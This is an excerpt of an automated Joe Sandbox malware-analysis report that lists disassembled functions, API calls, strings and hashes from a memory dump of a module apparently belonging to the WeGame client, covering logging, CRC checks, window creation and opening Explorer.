                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Copy_construct_fromH_prolog3$CountTick$?gen_seq_num@@?get_log_instance@base@@H_prolog3_H_prolog3_catch_Logger@1@MainPostTask@common@ierd_tgp@@ThreadV?$function@$$V?$shared_ptr@X@4@@Z@std@@
                                        • String ID: 2$d:\ci_dev\wegame_client\codes\common\src\comm_center.cpp$send_broadcast post_msg_cpp_func to cpp:%s, execute_time:%u
                                        • API String ID: 3135766933-516385757
                                        • Opcode ID: b15a4b5586cebcee52cbebe3fe6c0a2778fe52cc21242d0de0ee22c768d7ed63
                                        • Instruction ID: 901ac59e7f0e7054db20472d315c327da94394aa95e759a85ff2a89f37876363
                                        • Opcode Fuzzy Hash: b15a4b5586cebcee52cbebe3fe6c0a2778fe52cc21242d0de0ee22c768d7ed63
                                        • Instruction Fuzzy Hash: B2A17D709052589FDF14CFA8C984BDDBBF0BF09318F24819DE859A7A41DB34AA89CF51
                                        Function 6C0A2B50 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199COMMON
                                        Download Yara Rule
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,0000013C,?,000003FF,00000000,?,6C132AAD,?,00000000,?,00001F40,?,000003FF,?,00000000,00000400), ref: 6C0A2B5B
                                        • __snprintf_s.LIBCMT ref: 6C0A2B80
                                        • _time32.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 6C0A2B95
                                        • srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000), ref: 6C0A2B9B
                                        • rand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000), ref: 6C0A2BA0
                                        • __snprintf_s.LIBCMT ref: 6C0A2BD8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: __snprintf_s$_time32callocrandsrand
                                        • String ID: calloc err$tqos_create_protohandle err$tqos_find_connd_by_ip fail$tqos_get_qosconnd_iplist fail
                                        • API String ID: 2558427060-1278875725
                                        • Opcode ID: b219cbc496e63684bac48a8db0ce46b1c82398142bae1a4f7f2df769052eedf1
                                        • Instruction ID: 9ddb5c7edaf4800b9c02703a0fcf7343be4aebd743d0b656f9b4284958b46198
                                        • Opcode Fuzzy Hash: b219cbc496e63684bac48a8db0ce46b1c82398142bae1a4f7f2df769052eedf1
                                        • Instruction Fuzzy Hash: 44513A76504300ABC300DAA59C44B9F77E4AF8926CF144B2DF45A97B42E735E51B8BA2
                                        Function 6C0FA0FD Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 178fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,B33B76E5,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA164
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,B33B76E5,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA190
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,6C322B9A,000000FF), ref: 6C0FA19D
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\crc_helper.cpp,00000040,6C3CE62F,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA1D7
                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA234
                                        • ReadFile.KERNEL32(00000000,?,00010000,?,00000000,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA26D
                                        • ?cal_crc@common@ierd_tgp@@YAIIPAEI@Z.COMMON(00000000,?,?,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA28E
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,6C322B9A,000000FF), ref: 6C0FA2B4
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\crc_helper.cpp,0000004F,6C3CE62F,?,?,?,?,6C322B9A,000000FF), ref: 6C0FA2EE
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\crc_helper.cpp, xrefs: 6C0FA1BE, 6C0FA2D5
                                        • [crc_helper] open %s failed, error_code=%u, xrefs: 6C0FA1E7
                                        • [crc_helper] read %s failed, error_code=%u, xrefs: 6C0FA2FE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$?get_log_instance@base@@ErrorLastLogger@1@$?cal_crc@common@ierd_tgp@@?u8to16@common@ierd_tgp@@CreateD@2@@std@@D@std@@H_prolog3H_prolog3_ReadSizeU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@4@@W@std@@
                                        • String ID: [crc_helper] open %s failed, error_code=%u$[crc_helper] read %s failed, error_code=%u$d:\ci_dev\wegame_client\codes\common\src\crc_helper.cpp
                                        • API String ID: 1463018629-2195461796
                                        • Opcode ID: 5a3be2af8c6856acf62805f6742f8916fd0232a4b93a6939cff00a04c134da78
                                        • Instruction ID: 878664ac41efd0f6e565beb442e2d5115e61ad04eb4223d5e6c1cc6f85b1b6da
                                        • Opcode Fuzzy Hash: 5a3be2af8c6856acf62805f6742f8916fd0232a4b93a6939cff00a04c134da78
                                        • Instruction Fuzzy Hash: 8A619271A002189BDB62CF64CC44FDDB7F8AF49314F204099E599A7680DBB9ABC9CF51
                                        Function 6C15E127 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 126COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15E12E
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000068), ref: 6C15E136
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,00000068), ref: 6C15E1B7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000068), ref: 6C15E1C2
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000068), ref: 6C15E23E
                                        • ShellExecuteW.SHELL32(00000000,open,EXPLORER,?,00000000,00000001), ref: 6C15E22D
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • EXPLORER, xrefs: 6C15E222
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15E15C, 6C15E1EE, 6C15E262
                                        • [Sys_wrapper]Failed to convert path for open file mgr, xrefs: 6C15E202
                                        • open, xrefs: 6C15E227
                                        • [Sys_wrapper]open_file_mgr, path:%s, xrefs: 6C15E17A
                                        • [Sys_wrapper]Failed to call ShellExecute, ret=%d, xrefs: 6C15E277
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@ExecuteH_prolog3H_prolog3_ShellU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@4@@W@std@@
                                        • String ID: EXPLORER$[Sys_wrapper]Failed to call ShellExecute, ret=%d$[Sys_wrapper]Failed to convert path for open file mgr$[Sys_wrapper]open_file_mgr, path:%s$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp$open
                                        • API String ID: 2199624007-1312911427
                                        • Opcode ID: fadcd462b47369231c6a2c7cd93356e9b9ac30595cdf4960bc4ea750a6c9ce0e
                                        • Instruction ID: 9ca0e8729314471630c73e6cf9579f9d7b0f7b08658a016137d090fe3cd32c88
                                        • Opcode Fuzzy Hash: fadcd462b47369231c6a2c7cd93356e9b9ac30595cdf4960bc4ea750a6c9ce0e
                                        • Instruction Fuzzy Hash: E241CDB1A00604ABDB10DBA4CC91BDE77A49F15318F604558E411BBAC4EB3AAF49CFE1
                                        Function 6C16FE33 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C16FE3D
                                        • ?GetUpdatedFilePath@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0@Z.COMMON(?,tcls,teniodl.dll,00000434), ref: 6C16FE96
                                        • memset.VCRUNTIME140(?,00000000,00000208,00000000), ref: 6C16FED6
                                        • memset.VCRUNTIME140(?,00000000,00000208,?,00000000,00000208,00000000), ref: 6C16FEE4
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6C16FF26
                                        • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 6C16FF3B
                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 6C16FF48
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,6C43A5F8,\tcls\Tenio\TenioDL\TenioDL.dll,?), ref: 6C16FF7D
                                        • __Init_thread_footer.LIBCMT ref: 6C16FFF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$D@std@@NamePathU?$char_traits@V?$allocator@V?$basic_string@memset$?u16to8@common@ierd_tgp@@D@2@@4@@D@2@@std@@H_prolog3_Init_thread_footerLongModulePath@silence_update@common@ierd_tgp@@RemoveSpecU?$char_traits@_UpdatedV?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                                        • String ID: \tcls\Tenio\TenioDL\TenioDL.dll$tcls$teniodl.dll
                                        • API String ID: 571360966-3993699220
                                        • Opcode ID: e170b2aaee3e81a122ae8e5b9ce2937af107408e270453f98d280c6de8d4249a
                                        • Instruction ID: 7daaf8fe3ff10b948d2b8c7799943847d54b45e78c967e8e36a3bbdf61307019
                                        • Opcode Fuzzy Hash: e170b2aaee3e81a122ae8e5b9ce2937af107408e270453f98d280c6de8d4249a
                                        • Instruction Fuzzy Hash: CF417DF1A042189BCF20DF95C888BCDB7B8AF59318F90159DF108A7641CB795B89CF68
                                        Function 6C0C2B79 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(?), ref: 6C0C2B85
                                        • memset.VCRUNTIME140(?,00000000,0000002C,?), ref: 6C0C2BA7
                                        • GetModuleHandleA.KERNEL32(00000000,?,?), ref: 6C0C2BB1
                                        • GetStockObject.GDI32(00000005), ref: 6C0C2BC9
                                        • RegisterClassExA.USER32(00000030), ref: 6C0C2BDD
                                        • GetLastError.KERNEL32(?,?), ref: 6C0C2BEA
                                        • CreateWindowExA.USER32(?,?,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 6C0C2C0F
                                        • IsWindow.USER32(00000000), ref: 6C0C2C19
                                        • SetPropA.USER32(?,UtilWndObjt,?), ref: 6C0C2C2C
                                        • ShowWindow.USER32(?,00000000,?,?), ref: 6C0C2C37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Window$ClassCreateErrorHandleLastModuleObjectPropRegisterShowStockmemset
                                        • String ID: 0$UtilWndObjt
                                        • API String ID: 3867323892-1788187670
                                        • Opcode ID: a766fe6760843cd456ab19d1550bf7b502c5c0dfd39608ffa27b19c8bcbe28c9
                                        • Instruction ID: 247536c61c224fbcab75715d40e8fe676a0ff412d6eb3f7ad50128d6f8c943b4
                                        • Opcode Fuzzy Hash: a766fe6760843cd456ab19d1550bf7b502c5c0dfd39608ffa27b19c8bcbe28c9
                                        • Instruction Fuzzy Hash: EE2118B1A20255AFEB206FA0CC49BAFBBFCEB09345F404425F91AE5550D77099508B61
                                        Function 6C14AC59 Relevance: 19.9, APIs: 13, Instructions: 414COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C14AC63
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(00000000,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA9BB
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@1@Z.COMMON(?,?,?,6C345CA8,00000002,6C34A214,00000001,0000013C), ref: 6C14ACD6
                                          • Part of subcall function 6C14B318: __EH_prolog3_GS.LIBCMT ref: 6C14B31F
                                          • Part of subcall function 6C0AA3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0B62D8,00000000,6C0B6649,00000003,B33B76E5,?,?,00000000,6C316604,000000FF,?,6C0B5B05,00000000), ref: 6C0AA3E5
                                          • Part of subcall function 6C0AA8F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C0B5839,?,?), ref: 6C0AAA08
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@1@Z.COMMON(?,?,?,6C3CE7AC,00000001,?,?,?,?,?,?,?,?,?,6C34A214,00000001), ref: 6C14AD4D
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBBC,6C34BBB8), ref: 6C14ADC5
                                          • Part of subcall function 6C14B3EC: __EH_prolog3_GS.LIBCMT ref: 6C14B3F3
                                          • Part of subcall function 6C14B3EC: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000034,6C14ADCA,?,?,?,6C34BBBC,6C34BBB8), ref: 6C14B41D
                                          • Part of subcall function 6C14B3EC: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000001,?,?,?,00000034,6C14ADCA,?,?,?,6C34BBBC,6C34BBB8), ref: 6C14B43C
                                          • Part of subcall function 6C14B3EC: ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@1@Z.COMMON(?,?,?,00000001,?,?,?,00000034,6C14ADCA,?,?,?,6C34BBBC,6C34BBB8), ref: 6C14B44A
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBC0,6C34BBB8), ref: 6C14AE32
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBC4,6C34BBB8,?,6C34BBC0,6C34BBB8), ref: 6C14AEA9
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBC8,6C34BBB8,?,6C34BBC4,6C34BBB8,?,6C34BBC0,6C34BBB8), ref: 6C14AF38
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBCC,6C34BBB8,?,6C34BBC8,6C34BBB8,?,6C34BBC4,6C34BBB8,?,6C34BBC0,6C34BBB8), ref: 6C14AFD6
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBD0,6C34BBB8,?,6C34BBCC,6C34BBB8,?,6C34BBC8,6C34BBB8,?,6C34BBC4,6C34BBB8,?,6C34BBC0), ref: 6C14B074
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBD4,6C34BBB8,?,6C34BBD0,6C34BBB8,?,6C34BBCC,6C34BBB8,?,6C34BBC8,6C34BBB8,?,6C34BBC4), ref: 6C14B112
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBD8,6C34BBB8,?,6C34BBD4,6C34BBB8,?,6C34BBD0,6C34BBB8,?,6C34BBCC,6C34BBB8,?,6C34BBC8), ref: 6C14B1B0
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBDC,6C34BBB8,?,6C34BBD8,6C34BBB8,?,6C34BBD4,6C34BBB8,?,6C34BBD0,6C34BBB8,?,6C34BBCC), ref: 6C14B24E
                                        • ?replace_text@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@1@Z.COMMON(?,?,?,6C34BBE0,6C34BBB8,?,6C34BBDC,6C34BBB8,?,6C34BBD8,6C34BBB8,?,6C34BBD4,6C34BBB8,?,6C34BBD0), ref: 6C14B2EC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?replace_text@common@ierd_tgp@@D@2@@std@@$U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$W@2@@4@1@$H_prolog3_V34@1@$?u16to8@common@ierd_tgp@@D@2@@4@@W@2@@std@@_invalid_parameter_noinfo_noreturnmemmove
                                        • String ID:
                                        • API String ID: 1127383377-0
                                        • Opcode ID: 8bfcd20e7b7be403f8a2bfb39070af7815a70546a90b40ed327529bb5c27db96
                                        • Instruction ID: 84091d96ffaacd2190457a35f510fc794caba333994a673b8dc019ef45ec3db1
                                        • Opcode Fuzzy Hash: 8bfcd20e7b7be403f8a2bfb39070af7815a70546a90b40ed327529bb5c27db96
                                        • Instruction Fuzzy Hash: 7F12C0B0C112689EDB65CFA4C880BDDFBB4BF15304F5082AAD449B7690EB706B89CF55
                                        Function 6C10E19B Relevance: 19.6, APIs: 13, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E1B4
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E1C0
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E1CD
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E1EF
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E233
                                        • ?gbump@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 6C10E245
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E257
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E263
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E26D
                                        • ?pbump@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXH@Z.MSVCP140(00000000), ref: 6C10E27A
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E28D
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E2BD
                                        • ?pbump@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXH@Z.MSVCP140(00000002), ref: 6C10E2CF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?gptr@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?pbump@?$basic_streambuf@_$?gbump@?$basic_streambuf@_
                                        • String ID:
                                        • API String ID: 3070859240-0
                                        • Opcode ID: e36a3817e8f2f1bfe30aae56d7f43e9febeb2abfb808a8ac115b0eb3d73e6f49
                                        • Instruction ID: eddfb3504a21b570bf2a20c9afb7ae36715f88a06652ed4cc3211f8f66acc99f
                                        • Opcode Fuzzy Hash: e36a3817e8f2f1bfe30aae56d7f43e9febeb2abfb808a8ac115b0eb3d73e6f49
